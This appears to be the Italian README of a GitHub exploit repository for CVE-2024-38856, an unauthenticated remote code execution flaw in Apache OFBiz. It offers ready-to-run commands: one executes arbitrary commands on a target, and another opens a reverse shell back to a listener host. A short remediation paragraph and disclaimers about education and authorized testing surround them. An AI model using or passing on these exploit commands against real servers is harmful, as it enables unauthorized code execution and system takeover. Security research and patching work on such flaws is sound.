
Exploit per Apache OFBiz - CVE-2024-38856
Exploit per Apache OFBiz (CVE-2024-38856) Di: Alisson Faoli
Questo repository contiene un exploit per la vulnerabilità CVE-2024-38856 trovata in Apache OFBiz. Il difetto consente RCE non autenticata (Remote Code Execution).
Nota: Questo exploit è fornito solo per scopi educativi e di ricerca. L'uso improprio può essere illegale ed è di esclusiva responsabilità dell'utente.
CVE: CVE-2024-38856
Software interessato: Apache OFBiz fino alla versione 18.12.14
Tipo di vulnerabilità: RCE
Sfruttamento: Autenticazione non richiesta
Clona il repository:
git clone https://github.com/AlissonFaoli/Apache-OFBiz-Exploit.git
cd Apache-OFBiz-Exploit
Installa le dipendenze:
pip install -r requirements.txt
Esegui l'exploit:
RCE:
python3 CVE-2024-38856.py cmd -t https://10.150.10.200:8443 "whoami"
SHELL:
python3 CVE-2024-38856.py shell -t https://10.150.10.200:8443 -l 10.150.10.123 -p 4444
Per rimediare a questa vulnerabilità, si raccomanda agli amministratori di Apache OFBiz di: Aggiornare alla versione patchata disponibile su https://ofbiz.apache.org/download.html. Applicare regole firewall o WAF per bloccare i tentativi di sfruttamento noti.
Se hai domande o desideri segnalare un miglioramento all'exploit, contattami: LinkedIn: https://linkedin.com/in/alisson-faoli/
Questo codice è fornito esclusivamente per scopi educativi e test di sicurezza in ambienti autorizzati. L'autore non è responsabile per qualsiasi uso improprio.